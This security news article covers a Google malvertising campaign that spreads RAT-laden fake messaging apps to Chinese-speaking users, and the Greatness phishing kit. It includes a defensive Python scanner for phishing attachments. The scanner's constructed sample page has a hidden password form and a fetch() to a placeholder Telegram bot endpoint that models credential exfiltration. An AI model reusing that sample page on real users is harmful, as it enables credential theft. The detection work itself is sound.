Malvertising on Google targets Chinese users with fake spoofing apps

Recently, a series of malicious advertisements targeting Chinese-speaking users appeared on Google platforms, enticing users to download fake communication applications, which were actually malware containing Remote Administration Trojans (RATs). These ads were found to link to fake websites hosted on Google Docs or Google Sites and spread through Google infrastructure.

Summary

Recently, malicious advertisements targeting Chinese-speaking users appeared on Google's platforms, luring them to download restricted messaging apps such as Telegram as part of an ongoing malvertising campaign.

Malvertising campaign details

According to Jérôme Segura of Malwarebytes in a report on Thursday, the attackers abused Google advertiser accounts to create malicious advertisements and point them to pages that download Remote Administration Trojans (RATs). Such programs allow attackers to take full control of a victim's computer and drop more malicious software.

Notably, the campaign, codenamed FakeAPP, follows a wave of attacks in late October 2023 targeting Hong Kong users looking for messaging apps like WhatsApp and Telegram on search engines.


The latest iteration of the campaign also adds messaging app LINE to the list, directing users to fake websites hosted on Google Docs or Google Sites.

Cyber security and fraudulent advertising

That Google infrastructure is used to embed links to other attacker-controlled websites, which distribute malicious installers that eventually deploy Trojans such as PlugX and Gh0st RAT.

Malwarebytes traced two fraudulent advertising accounts named Interactive Communication Team Limited and Ringier Media Nigeria Limited, both based in Nigeria.

"Attackers seem to favor quantity over quality," Segura said, "constantly rolling out new payloads and command-and-control infrastructure."


Additionally, Trustwave SpiderLabs uncovered a surge in the use of a phishing-as-a-service (PhaaS) platform called Greatness, which creates legitimate-looking credential-gathering pages targeting Microsoft 365 users.


The toolkit allows personalization of sender names, email addresses, subjects, messages, attachments and QR codes to increase relevance and engagement, and comes with anti-detection measures such as randomized headers, encoding and obfuscation designed to bypass spam filters and security systems.

Greatness is sold to other criminals for $120 per month, effectively lowering the barrier to entry and helping them scale their attacks.

The attack chain consisted of sending phishing emails with malicious HTML attachments that, when opened by the recipient, directed them to a fake login page that captured the login credentials entered and leaked the details to the attackers via Telegram.
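The attachment-based chain described above (an HTML file that renders a fake login page and sends the captured credentials away via Telegram) leaves traits a mail gateway or analyst can look for before anyone opens the file: a password field, a form posting to an external host, a reference to the Telegram Bot API, and the base64 `atob()` wrapping that kits of this type use to hide the real page. The following heuristic scanner is an added example for this article, not code from Malwarebytes, Trustwave or the Greatness kit; the two HTML attachments it scans are constructed here, the domain `login-verify.example.invalid` and the bot token `000000:PLACEHOLDER` are placeholders, and the indicator names are my own.

```python
"""Heuristic triage of an HTML e-mail attachment for credential-phishing traits."""
import base64
import re
from html.parser import HTMLParser

# Indicator patterns (assumptions for this example, not signatures from the article).
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot", re.I)
OBFUSCATION_CALLS = re.compile(r"\b(unescape|atob|eval|String\.fromCharCode)\s*\(")
ATOB_LITERAL = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")


class _PageScanner(HTMLParser):
    """Collects the two markup features the heuristics look at: password inputs and form targets."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))


def _decode_atob_literals(text):
    """Return the decoded text of every base64 literal passed to atob(); skip malformed ones."""
    decoded = []
    for m in ATOB_LITERAL.finditer(text):
        try:
            raw = base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)
            decoded.append(raw.decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError
            pass
    return decoded


def scan_html_attachment(html, depth=0):
    """Return the sorted list of indicator names found in the attachment.

    Scans the raw markup, then (one level deep) the content of any atob() literal,
    because a page hidden in base64 shows none of the indicators until decoded.
    """
    indicators = set()
    scanner = _PageScanner()
    scanner.feed(html)
    if scanner.password_inputs:
        indicators.add("password_form")
    if any(a.lower().startswith(("http://", "https://")) for a in scanner.form_actions):
        indicators.add("external_form_action")
    if TELEGRAM_BOT_API.search(html):
        indicators.add("telegram_bot_api")
    if OBFUSCATION_CALLS.search(html):
        indicators.add("js_decoding_call")
    if depth == 0:
        for inner in _decode_atob_literals(html):
            indicators.update(scan_html_attachment(inner, depth=1))
    return sorted(indicators)


def classify(indicators):
    """Coarse verdict: a credential form combined with exfil or obfuscation is the phishing shape."""
    exfil_or_hiding = {"telegram_bot_api", "external_form_action", "js_decoding_call"}
    if "password_form" in indicators and exfil_or_hiding & set(indicators):
        return "suspicious"
    if indicators:
        return "review"
    return "clean"


# Constructed sample 1: a decoy page whose real login form is hidden in a base64 blob.
_INNER_PAGE = (
    '<form method="post" action="https://login-verify.example.invalid/collect">'
    '<input type="email" name="u"><input type="password" name="p"></form>'
    '<script>fetch("https://api.telegram.org/bot000000:PLACEHOLDER/sendMessage");</script>'
)
SAMPLE_ENCODED_PHISH = (
    '<html><body><script>document.write(atob("'
    + base64.b64encode(_INNER_PAGE.encode()).decode()
    + '"));</script></body></html>'
)

# Constructed sample 2: a plain newsletter with no forms or scripts.
SAMPLE_BENIGN = (
    "<html><body><h1>Monthly update</h1><p>See you at the meetup.</p>"
    "<a href='https://example.com'>Agenda</a></body></html>"
)

if __name__ == "__main__":
    for name, sample in (("encoded phish", SAMPLE_ENCODED_PHISH), ("benign", SAMPLE_BENIGN)):
        found = scan_html_attachment(sample)
        print(f"{name}: {classify(found)} {found}")
```

The decode step matters more than any single pattern: the outer markup of the first sample shows only a call to `atob()`, and the password form and Telegram endpoint surface only after the literal is base64-decoded and rescanned. In a gateway this would run on attachments before delivery; the "review" verdict is deliberately conservative, because a password form alone is unusual in an attachment but not proof of phishing.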

Other infection sequences utilize attachments to drop malware on the victim's machine to facilitate information theft.

Cyber security and the modus operandi of the attack

To increase the likelihood of a successful attack, email messages masquerade as trusted sources, such as banks and employers, and use topics such as "Urgent Invoice Payment" or "Urgent Account Verification Request" to induce a false sense of urgency.

Trustwave notes that the number of victims cannot be determined at this time, but that Greatness is widely used and well-supported, and that its own Telegram community provides information on how to operate the toolkit, as well as other technical

Original article by Chief Security Officer. If reproduced, please credit https://www.cncso.com/en/malicious-ads-on-google-target-chinese-users-publishing.html
